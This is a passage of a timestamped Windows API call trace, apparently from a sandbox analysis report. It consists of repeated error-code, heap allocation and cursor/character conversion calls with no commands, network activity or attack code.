returned 0x0 [0110.988] SetLastError (dwErrCode=0x0) [0110.988] GetLastError () returned 0x0 [0110.988] SetLastError (dwErrCode=0x0) [0110.988] GetLastError () returned 0x0 [0110.988] SetLastError (dwErrCode=0x0) [0110.988] GetLastError () returned 0x0 [0110.988] SetLastError (dwErrCode=0x0) [0110.988] GetLastError () returned 0x0 [0110.989] SetLastError (dwErrCode=0x0) [0110.989] GetLastError () returned 0x0 [0110.989] SetLastError (dwErrCode=0x0) [0110.989] GetLastError () returned 0x0 [0110.989] SetLastError (dwErrCode=0x0) [0110.989] GetLastError () returned 0x0 [0110.989] SetLastError (dwErrCode=0x0) [0110.989] GetLastError () returned 0x0 [0110.989] SetLastError (dwErrCode=0x0) [0110.989] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x7d) returned 0x211a48 [0110.989] GetLastError () returned 0x0 [0110.989] SetLastError (dwErrCode=0x0) [0110.989] GetLastError () returned 0x0 [0110.989] SetLastError (dwErrCode=0x0) [0110.989] GetLastError () returned 0x0 [0110.989] SetLastError (dwErrCode=0x0) [0110.989] GetLastError () returned 0x0 [0110.989] SetLastError (dwErrCode=0x0) [0110.990] GetLastError () returned 0x0 [0110.990] SetLastError (dwErrCode=0x0) [0110.990] GetLastError () returned 0x0 [0110.990] SetLastError (dwErrCode=0x0) [0110.990] GetLastError () returned 0x0 [0110.990] SetLastError (dwErrCode=0x0) [0110.990] GetLastError () returned 0x0 [0110.990] SetLastError (dwErrCode=0x0) [0110.990] GetLastError () returned 0x0 [0110.990] SetLastError (dwErrCode=0x0) [0110.990] GetLastError () returned 0x0 [0110.990] SetLastError (dwErrCode=0x0) [0110.990] GetLastError () returned 0x0 [0110.990] SetLastError (dwErrCode=0x0) [0110.990] GetLastError () returned 0x0 [0110.990] SetLastError (dwErrCode=0x0) [0110.990] GetLastError () returned 0x0 [0110.990] SetLastError (dwErrCode=0x0) [0110.990] GetLastError () returned 0x0 [0110.991] SetLastError (dwErrCode=0x0) [0110.991] GetLastError () returned 0x0 [0110.991] SetLastError (dwErrCode=0x0) [0110.991] GetLastError () returned 0x0 [0110.991] SetLastError (dwErrCode=0x0) [0110.991] GetLastError () returned 0x0 [0110.991] SetLastError (dwErrCode=0x0) [0110.991] GetLastError () returned 0x0 [0110.991] SetLastError (dwErrCode=0x0) [0110.991] GetLastError () returned 0x0 [0110.991] SetLastError (dwErrCode=0x0) [0110.991] GetLastError () returned 0x0 [0110.991] SetLastError (dwErrCode=0x0) [0110.991] GetLastError () returned 0x0 [0110.991] SetLastError (dwErrCode=0x0) [0110.991] GetLastError () returned 0x0 [0110.991] SetLastError (dwErrCode=0x0) [0110.991] GetLastError () returned 0x0 [0110.992] SetLastError (dwErrCode=0x0) [0110.992] GetLastError () returned 0x0 [0110.992] SetLastError (dwErrCode=0x0) [0110.992] GetLastError () returned 0x0 [0110.992] SetLastError (dwErrCode=0x0) [0110.992] GetLastError () returned 0x0 [0110.992] SetLastError (dwErrCode=0x0) [0110.992] GetLastError () returned 0x0 [0110.992] SetLastError (dwErrCode=0x0) [0110.992] GetLastError () returned 0x0 [0110.992] SetLastError (dwErrCode=0x0) [0110.992] GetLastError () returned 0x0 [0110.992] SetLastError (dwErrCode=0x0) [0110.992] GetLastError () returned 0x0 [0110.992] SetLastError (dwErrCode=0x0) [0110.992] GetLastError () returned 0x0 [0110.992] SetLastError (dwErrCode=0x0) [0110.992] GetLastError () returned 0x0 [0110.993] SetLastError (dwErrCode=0x0) [0110.993] GetLastError () returned 0x0 [0110.993] SetLastError (dwErrCode=0x0) [0110.993] GetLastError () returned 0x0 [0110.993] SetLastError (dwErrCode=0x0) [0110.993] GetLastError () returned 0x0 [0110.993] SetLastError (dwErrCode=0x0) [0110.993] GetLastError () returned 0x0 [0110.993] SetLastError (dwErrCode=0x0) [0110.993] GetLastError () returned 0x0 [0110.993] SetLastError (dwErrCode=0x0) [0110.993] GetLastError () returned 0x0 [0110.993] SetLastError (dwErrCode=0x0) [0110.993] GetLastError () returned 0x0 [0110.993] SetLastError (dwErrCode=0x0) [0110.993] GetLastError () returned 0x0 [0110.993] SetLastError (dwErrCode=0x0) [0110.993] GetLastError () returned 0x0 [0110.993] SetLastError (dwErrCode=0x0) [0110.994] GetLastError () returned 0x0 [0110.994] SetLastError (dwErrCode=0x0) [0110.994] GetLastError () returned 0x0 [0110.994] SetLastError (dwErrCode=0x0) [0110.994] GetLastError () returned 0x0 [0110.994] SetLastError (dwErrCode=0x0) [0110.994] GetLastError () returned 0x0 [0110.994] SetLastError (dwErrCode=0x0) [0110.994] GetLastError () returned 0x0 [0110.994] SetLastError (dwErrCode=0x0) [0110.994] GetLastError () returned 0x0 [0110.994] SetLastError (dwErrCode=0x0) [0110.994] GetLastError () returned 0x0 [0110.994] SetLastError (dwErrCode=0x0) [0110.994] GetLastError () returned 0x0 [0110.994] SetLastError (dwErrCode=0x0) [0110.994] GetLastError () returned 0x0 [0110.994] SetLastError (dwErrCode=0x0) [0110.994] GetLastError () returned 0x0 [0110.995] SetLastError (dwErrCode=0x0) [0110.995] GetLastError () returned 0x0 [0110.995] SetLastError (dwErrCode=0x0) [0110.995] GetLastError () returned 0x0 [0110.995] SetLastError (dwErrCode=0x0) [0110.995] GetLastError () returned 0x0 [0110.995] SetLastError (dwErrCode=0x0) [0110.995] GetLastError () returned 0x0 [0110.995] SetLastError (dwErrCode=0x0) [0110.995] GetLastError () returned 0x0 [0110.995] SetLastError (dwErrCode=0x0) [0110.995] GetLastError () returned 0x0 [0110.995] SetLastError (dwErrCode=0x0) [0110.995] GetLastError () returned 0x0 [0110.995] SetLastError (dwErrCode=0x0) [0110.995] GetLastError () returned 0x0 [0110.995] SetLastError (dwErrCode=0x0) [0110.995] GetLastError () returned 0x0 [0110.996] SetLastError (dwErrCode=0x0) [0110.996] GetLastError () returned 0x0 [0110.996] SetLastError (dwErrCode=0x0) [0110.996] GetLastError () returned 0x0 [0110.996] SetLastError (dwErrCode=0x0) [0110.996] GetLastError () returned 0x0 [0110.996] SetLastError (dwErrCode=0x0) [0110.996] GetLastError () returned 0x0 [0110.996] SetLastError (dwErrCode=0x0) [0110.996] GetLastError () returned 0x0 [0110.996] SetLastError (dwErrCode=0x0) [0110.996] GetLastError () returned 0x0 [0110.996] SetLastError (dwErrCode=0x0) [0110.996] GetLastError () returned 0x0 [0110.996] SetLastError (dwErrCode=0x0) [0110.996] GetLastError () returned 0x0 [0110.996] SetLastError (dwErrCode=0x0) [0110.996] GetLastError () returned 0x0 [0110.997] SetLastError (dwErrCode=0x0) [0110.997] GetLastError () returned 0x0 [0110.997] SetLastError (dwErrCode=0x0) [0110.997] GetLastError () returned 0x0 [0110.997] SetLastError (dwErrCode=0x0) [0110.997] GetLastError () returned 0x0 [0110.997] SetLastError (dwErrCode=0x0) [0110.997] GetLastError () returned 0x0 [0110.997] SetLastError (dwErrCode=0x0) [0110.997] GetLastError () returned 0x0 [0110.997] SetLastError (dwErrCode=0x0) [0110.997] GetLastError () returned 0x0 [0110.997] SetLastError (dwErrCode=0x0) [0110.997] GetLastError () returned 0x0 [0110.997] SetLastError (dwErrCode=0x0) [0110.997] GetLastError () returned 0x0 [0110.997] SetLastError (dwErrCode=0x0) [0110.997] GetLastError () returned 0x0 [0110.997] SetLastError (dwErrCode=0x0) [0110.998] GetLastError () returned 0x0 [0110.998] SetLastError (dwErrCode=0x0) [0110.998] GetLastError () returned 0x0 [0110.998] SetLastError (dwErrCode=0x0) [0110.998] GetLastError () returned 0x0 [0110.998] SetLastError (dwErrCode=0x0) [0110.998] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0xbc) returned 0x211ad0 [0110.998] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x43) returned 0x211b98 [0110.998] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x4f) returned 0x211be8 [0110.998] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x5b) returned 0x211c40 [0110.998] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x60) returned 0x211ca8 [0110.998] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x55) returned 0x211d10 [0110.998] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x3c) returned 0x211d70 [0110.998] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x48) returned 0x211db8 [0110.999] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x38) returned 0x211e08 [0110.999] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x31) returned 0x211e48 [0110.999] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x3e) returned 0x211e88 [0110.999] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x52) returned 0x211ed0 [0110.999] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x3d) returned 0x211f30 [0110.999] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x3b) returned 0x211f78 [0110.999] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x32) returned 0x211fc0 [0110.999] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0xb9) returned 0x212000 [0111.000] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x62) returned 0x2120c8 [0111.000] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x3f) returned 0x212138 [0111.000] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x41) returned 0x212180 [0111.000] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x6c) returned 0x2121d0 [0111.000] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x36) returned 0x212248 [0111.000] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x3c) returned 0x212288 [0111.000] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x3f) returned 0x2122d0 [0111.000] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x48) returned 0x212318 [0111.000] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x4d) returned 0x212368 [0111.000] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x42) returned 0x2123c0 [0111.000] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x8f) returned 0x212410 [0111.000] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x3b) returned 0x2124a8 [0111.001] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x33) returned 0x2124f0 [0111.001] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x3a) returned 0x212530 [0111.001] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x4e) returned 0x212578 [0111.001] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x4d) returned 0x2125d0 [0111.001] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x3a) returned 0x212628 [0111.005] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x37) returned 0x212670 [0111.005] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x43) returned 0x2126b0 [0111.005] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x36) returned 0x212700 [0111.005] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x3c) returned 0x212740 [0111.024] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x6a) returned 0x212788 [0111.024] HeapValidate (hHeap=0x210000, dwFlags=0x0, lpMem=0x211240) returned 1 [0111.024] HeapFree (in: hHeap=0x210000, dwFlags=0x0, lpMem=0x211240 | out: hHeap=0x210000) returned 1 [0111.024] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x752b0000 [0111.024] GetProcAddress (hModule=0x752b0000, lpProcName="IsProcessorFeaturePresent") returned 0x752c51ed [0111.024] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0111.026] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0xa4) returned 0x211240 [0111.026] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x824) returned 0x212800 [0111.026] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x417360) returned 0x0 [0111.027] HeapValidate (hHeap=0x210000, dwFlags=0x0, lpMem=0x211240) returned 1 [0111.028] HeapValidate (hHeap=0x210000, dwFlags=0x0, lpMem=0x211240) returned 1 [0111.028] GetLastError () returned 0x0 [0111.028] SetLastError (dwErrCode=0x0) [0111.028] GetLastError () returned 0x0 [0111.028] SetLastError (dwErrCode=0x0) [0111.028] GetLastError () returned 0x0 [0111.028] SetLastError (dwErrCode=0x0) [0111.029] GetLastError () returned 0x0 [0111.029] SetLastError (dwErrCode=0x0) [0111.029] GetLastError () returned 0x0 [0111.029] SetLastError (dwErrCode=0x0) [0111.029] GetLastError () returned 0x0 [0111.029] SetLastError (dwErrCode=0x0) [0111.029] GetLastError () returned 0x0 [0111.029] SetLastError (dwErrCode=0x0) [0111.029] GetLastError () returned 0x0 [0111.029] SetLastError (dwErrCode=0x0) [0111.029] GetLastError () returned 0x0 [0111.029] SetLastError (dwErrCode=0x0) [0111.029] GetLastError () returned 0x0 [0111.029] SetLastError (dwErrCode=0x0) [0111.029] GetLastError () returned 0x0 [0111.029] SetLastError (dwErrCode=0x0) [0111.029] GetLastError () returned 0x0 [0111.029] SetLastError (dwErrCode=0x0) [0111.030] GetLastError () returned 0x0 [0111.030] SetLastError (dwErrCode=0x0) [0111.030] GetLastError () returned 0x0 [0111.030] SetLastError (dwErrCode=0x0) [0111.030] GetLastError () returned 0x0 [0111.030] SetLastError (dwErrCode=0x0) [0111.030] GetLastError () returned 0x0 [0111.030] SetLastError (dwErrCode=0x0) [0111.030] GetLastError () returned 0x0 [0111.030] SetLastError (dwErrCode=0x0) [0111.030] GetLastError () returned 0x0 [0111.030] SetLastError (dwErrCode=0x0) [0111.030] GetLastError () returned 0x0 [0111.030] SetLastError (dwErrCode=0x0) [0111.030] GetLastError () returned 0x0 [0111.030] SetLastError (dwErrCode=0x0) [0111.030] GetLastError () returned 0x0 [0111.030] SetLastError (dwErrCode=0x0) [0111.030] GetLastError () returned 0x0 [0111.031] SetLastError (dwErrCode=0x0) [0111.031] GetLastError () returned 0x0 [0111.031] SetLastError (dwErrCode=0x0) [0111.031] GetLastError () returned 0x0 [0111.031] SetLastError (dwErrCode=0x0) [0111.031] GetLastError () returned 0x0 [0111.031] SetLastError (dwErrCode=0x0) [0111.031] GetLastError () returned 0x0 [0111.031] SetLastError (dwErrCode=0x0) [0111.031] GetLastError () returned 0x0 [0111.031] SetLastError (dwErrCode=0x0) [0111.031] GetLastError () returned 0x0 [0111.031] SetLastError (dwErrCode=0x0) [0111.031] GetLastError () returned 0x0 [0111.031] SetLastError (dwErrCode=0x0) [0111.031] GetLastError () returned 0x0 [0111.031] SetLastError (dwErrCode=0x0) [0111.031] GetLastError () returned 0x0 [0111.032] SetLastError (dwErrCode=0x0) [0111.032] GetLastError () returned 0x0 [0111.032] SetLastError (dwErrCode=0x0) [0111.032] GetLastError () returned 0x0 [0111.032] SetLastError (dwErrCode=0x0) [0111.032] GetLastError () returned 0x0 [0111.032] SetLastError (dwErrCode=0x0) [0111.032] GetLastError () returned 0x0 [0111.032] SetLastError (dwErrCode=0x0) [0111.032] GetLastError () returned 0x0 [0111.032] SetLastError (dwErrCode=0x0) [0111.033] GetLastError () returned 0x0 [0111.033] SetLastError (dwErrCode=0x0) [0111.033] GetLastError () returned 0x0 [0111.033] SetLastError (dwErrCode=0x0) [0111.033] GetLastError () returned 0x0 [0111.033] SetLastError (dwErrCode=0x0) [0111.033] GetLastError () returned 0x0 [0111.033] SetLastError (dwErrCode=0x0) [0111.033] GetLastError () returned 0x0 [0111.033] SetLastError (dwErrCode=0x0) [0111.033] GetLastError () returned 0x0 [0111.033] SetLastError (dwErrCode=0x0) [0111.033] GetLastError () returned 0x0 [0111.033] SetLastError (dwErrCode=0x0) [0111.033] GetLastError () returned 0x0 [0111.034] SetLastError (dwErrCode=0x0) [0111.034] GetLastError () returned 0x0 [0111.034] SetLastError (dwErrCode=0x0) [0111.034] GetLastError () returned 0x0 [0111.034] SetLastError (dwErrCode=0x0) [0111.034] GetLastError () returned 0x0 [0111.034] SetLastError (dwErrCode=0x0) [0111.034] GetLastError () returned 0x0 [0111.034] SetLastError (dwErrCode=0x0) [0111.034] GetLastError () returned 0x0 [0111.034] SetLastError (dwErrCode=0x0) [0111.034] GetLastError () returned 0x0 [0111.034] SetLastError (dwErrCode=0x0) [0111.034] GetLastError () returned 0x0 [0111.034] SetLastError (dwErrCode=0x0) [0111.034] GetLastError () returned 0x0 [0111.034] SetLastError (dwErrCode=0x0) [0111.034] GetLastError () returned 0x0 [0111.034] SetLastError (dwErrCode=0x0) [0111.035] GetLastError () returned 0x0 [0111.035] SetLastError (dwErrCode=0x0) [0111.035] GetLastError () returned 0x0 [0111.035] SetLastError (dwErrCode=0x0) [0111.035] GetLastError () returned 0x0 [0111.035] SetLastError (dwErrCode=0x0) [0111.035] GetLastError () returned 0x0 [0111.035] SetLastError (dwErrCode=0x0) [0111.035] GetLastError () returned 0x0 [0111.035] SetLastError (dwErrCode=0x0) [0111.035] GetLastError () returned 0x0 [0111.035] SetLastError (dwErrCode=0x0) [0111.035] GetLastError () returned 0x0 [0111.035] SetLastError (dwErrCode=0x0) [0111.035] GetLastError () returned 0x0 [0111.035] SetLastError (dwErrCode=0x0) [0111.035] GetLastError () returned 0x0 [0111.036] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.036] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.046] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.046] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.046] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.046] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.047] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.047] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.047] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.047] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.047] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.047] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.047] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.047] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.047] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.047] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.047] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.047] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.047] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.047] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.047] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.047] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.048] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.048] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.048] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.048] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.048] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.048] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.048] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.048] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.048] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.048] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.048] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.048] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.048] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.048] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.049] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.049] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.049] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.049] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.049] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.049] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.049] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.049] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.049] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.049] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.049] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.049] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.049] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.049] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.049] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.049] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.049] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.049] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.050] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.050] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.050] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.050] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.050] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.050] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.050] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.050] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.050] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.050] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.050] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.050] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.050] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.050] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.050] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.050] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.051] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.051] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.051] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.051] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.051] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.051] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.051] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.051] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.051] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.051] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.051] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.051] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.051] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.051] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.051] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.051] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.051] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.052] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.052] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.052] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.052] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.052] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.052] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.052] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.052] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.052] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.052] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.052] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.052] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.052] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.052] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.052] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.053] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.053] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.053] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.053] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.053] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.053] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.053] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.053] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.053] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.053] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0111.053] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0111.053] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, 